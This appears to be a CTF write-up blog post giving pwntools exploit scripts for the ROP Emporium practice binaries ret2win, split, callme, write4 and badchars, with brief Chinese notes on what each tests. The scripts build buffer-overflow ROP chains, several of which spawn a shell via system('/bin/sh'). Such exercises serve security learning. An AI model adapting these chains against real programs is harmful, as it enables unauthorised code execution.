##ret2win
from pwn import *
p = process('./ret2win')
system_addr = 0x0400824
pad = 'a'*0x20+'deadbeef'
payload = pad+p64(system_addr)
p.sendline(payload)
p.interactive()##split
考察将字符串通过寄存器存到函数当中,要熟练掌握x86与x64的传参规律.
from pwn import *
p = process('./split')
#elf = ELF('./split')
system_addr = 0x00400810
#system_addr = elf.symbols['system']
cat_flag_addr = 0x00601060
pop_rdi_ret = 0x00400883
pad = 'A'*40
payload = pad+p64(pop_rdi_ret)+p64(cat_flag_addr)+p64(system_addr)
p.sendline(payload)
p.interactive()##callme
对参数传递的考察
from pwn import *
context.log_level = 'debug'
p = process('./callme')
elf = ELF('./callme')
# info
# gadget
pppr = 0x0000000000401ab0 # pop rdi ; pop rsi ; pop rdx ; ret
callme_three = 0x401810
callme_two = 0x401870
callme_one = 0x401850
# rop1
offset = 40
payload = '\0'*offset
payload += p64(pppr+3)
payload += p64(pppr) + p64(1) + p64(2) + p64(3) + p64(callme_one)
payload += p64(pppr) + p64(1) + p64(2) + p64(3) + p64(callme_two)
payload += p64(pppr) + p64(1) + p64(2) + p64(3) + p64(callme_three)
# debug()
p.recvuntil('>')
p.sendline(payload)
p.interactive()##write4
考察通过将字符串写入.bss段来将字符串传递给system函数然后getshell,同时考察gadget的选取与对段的理解。
from pwn import *
context.log_level = 'debug'
p = process('./write4')
sys_addr = 0x00400810
bss_addr = 0x601060
mov_r14_r15 = 0x400820
pop_r14_r15 = 0x400890
pop_rdi = 0x400893
payload = 'a'*(0x20+8)
payload += p64(pop_r14_r15) #清空寄存器
payload += p64(bss_addr) #向r14中写入bss段地址
payload += "/bin/sh".ljust(8,"\x00") #向r15中写入/bin/sh\x00
payload += p64(mov_r14_r15) #将r15中的字符串写入r14
payload += p64(pop_rdi) #清空rdi
payload += p64(bss_addr) #向rdi中写入bss中的字符串
payload += p64(sys_addr) #rdi向system传参
p.recvuntil('>')
p.sendline(payload)
p.recv()
p.interactive()##badchars
from pwn import *
p = process('./badchars')
elf = ELF('./badchars')
context.log_level = 'debug'
# gadget
prdi = 0x400b39
p1213 = 0x400b3b
m1213 = 0x400b34
system = 0x04009E8
#system = elf.plt['system']
p1415 = 0x400b40
x1415 = 0x400b30
'''
0x400b30 <usefulGadgets>: xor BYTE PTR [r15],r14b
0x400b33 <usefulGadgets+3>: ret
0x400b34 <usefulGadgets+4>: mov QWORD PTR [r13+0x0],r12
0x400b38 <usefulGadgets+8>: ret
0x400b39 <usefulGadgets+9>: pop rdi
=> 0x400b3a <usefulGadgets+10>: ret
0x400b3b <usefulGadgets+11>: pop r12
0x400b3d <usefulGadgets+13>: pop r13
0x400b3f <usefulGadgets+15>: ret
0x400b40 <usefulGadgets+16>: pop r14
0x400b42 <usefulGadgets+18>: pop r15
0x400b44 <usefulGadgets+20>: ret
'''
# rop1
offset = 40
payload = 'A'*offset
# filtered: bic/ fns
# $0 is okay, but use gadget x1415 to get /bin/sh via xor is the goal (too lazy to write exp)
payload += p64(p1213) + '$0\0\0\0\0\0\0' + p64(elf.bss()+0x400) + p64(m1213)
payload += p64(prdi) + p64(elf.bss()+0x400) + p64(system)
# debug()
p.recvuntil('>')
p.sendline(payload)
p.interactive()I'm so cute. Please give me money.
- 記事へのリンク:https://torebtr.github.io/2020/10/02/ROPempire/
- 著作権表示:このブログ内のすべての記事は、特別な記載がない限り の下のライセンスで保護されています。
GitHub IssuesGitHub Discussions